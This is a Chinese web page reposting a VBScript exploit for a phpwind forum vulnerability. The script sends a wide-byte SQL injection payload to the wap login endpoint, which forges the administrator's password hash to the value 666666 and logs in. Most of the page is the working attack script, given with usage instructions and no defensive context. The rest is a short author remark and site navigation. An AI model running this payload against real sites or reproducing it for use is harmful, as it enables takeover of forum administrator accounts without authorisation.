phpwind任意修改管理员密码漏洞 VBS版利用程序

页面导航:首页 > 软件编程 > vb.net > phpwind任意修改管理员密码漏洞 VBS版利用程序

phpwind任意修改管理员密码漏洞 VBS版利用程序

来源: 作者: 时间:2016-01-21 10:23 【

作者:Tr4c3phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3Dim strUrl, strPost, xPost, strGetSet Args = Wscript.ArgumentsIf Args.count2 ThenWscript.Echo "Usage: " Wscript.ScriptName " http://hi

作者:

phpwind任意修改管理员密码 VBS版利用程序 By Tr4c3
Dim strUrl, strPost, xPost, strGet
Set Args = Wscript.Arguments
If Args.count<>2 Then
Wscript.Echo "Usage: " & Wscript.ScriptName & " 1"
Wscript.Quit
Else
strUrl = Args(0) & "wap/index.php"

strPost = "db_wapifopen=1&prog=login&pwuser=shit%c1union select "& Args(1) &",mid(md5(666666),9,16),3,1,5/*&pwpwd=666666"
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST", strUrl, False
xPost.SetRequestHeader "Referer", strUrl
xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
xPost.send(strPost)
strGet = xPost.ResponseText
If InStr(strGet,"登录成功")<>0 Then
Wscript.Echo("执行成功")
Else
Wscript.Echo("执行失败")
End If
End If

题外话:
某些人要清楚看别人的文章不一定要懂别人写exp的语言,理解了原理,用自己懂的语言搞个exp是很容易的,别动不动就觉得别人搞笑。乱改别人文章是不好的。
漏洞信息:
相关:">http://hi.baidu.com/biweilun/blog/item/21c0cf1781585b0fc93d6dd7.html

Tags:

相关文章

    文章评论

    最 近 更 新
    热 点 排 行
    Js与CSS工具
    代码转换工具
    
    <